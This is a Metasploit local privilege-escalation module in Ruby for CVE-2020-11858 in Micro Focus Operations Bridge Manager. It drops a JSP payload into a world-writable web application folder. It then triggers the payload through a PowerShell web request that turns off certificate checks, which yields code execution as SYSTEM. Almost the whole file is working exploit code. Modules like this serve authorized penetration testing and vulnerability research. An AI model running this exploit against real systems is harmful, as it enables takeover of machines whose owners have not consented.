##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Powershell
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Micro Focus Operations Bridge Manager Local Privilege Escalation',
        'Description' => %q{
          This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge
          Manager.
          An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and
          then access it without authentication by making a request to the OBM server.
          This will result in automatic code execution as SYSTEM. This module has been tested on
          OBM 2020.05, but it should work out of the box on earlier versions too.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
          ],
        'Platform' => 'win',
        'Privileged' => true,
        'SessionTypes' => ['meterpreter'],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Targets' =>
          [
            [
              'Micro Focus Operations Bridge Manager <= 2020.05',
              {
                'Path' => 'C:\HPBSM\AppServer\webapps\site.war\LB_Verify.jsp'
              }
            ]
          ],
        'References' =>
          [
            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
            [ 'CVE', '2020-11858'],
            [ 'ZDI', '20-1326'],
          ],
        'DisclosureDate' => '2020-10-28',
        'DefaultTarget' => 0
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
    ])
  end

  def exploit
    unless session.type == 'meterpreter'
      fail_with(Failure::None, 'Only meterpreter sessions are supported')
    end

    unless have_powershell?
      fail_with(Failure::None, 'No Powershell is installed on the host')
    end

    # according to /lib/msf/core/post/file.rb this is not binary safe on Windows, but we don't care, it's JSP
    payload_jsp = Msf::Util::EXE.to_jsp(generate_payload_exe)
    write_file(target['Path'], payload_jsp)

    if datastore['SSL']
      prefix = 'https://'
      # Code below allows us to perform TLS requests to servers with self signed certs
      # In Powershell 5.1, we can simply use -SkipCertificateCheck, but in older versions we need this
      # Taken from https://stackoverflow.com/questions/11696944/powershell-v3-invoke-webrequest-https-error
      ps_cmd = %[
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
    public bool CheckValidationResult(
        ServicePoint srvPoint, X509Certificate certificate,
        WebRequest request, int certificateProblem) {
        return true;
    }
}
"@
$AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
[System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
]
    else
      prefix = 'http://'
      ps_cmd = ''
    end

    uri = "#{prefix}127.0.0.1:#{datastore['RPORT']}#{datastore['TARGETURI']}topaz/LB_Verify.jsp"
    print_status("JSP dropped, calling it @ #{uri}")
    ps_cmd += "Invoke-WebRequest -Uri #{uri}"
    execute_script(ps_cmd)
  end
end
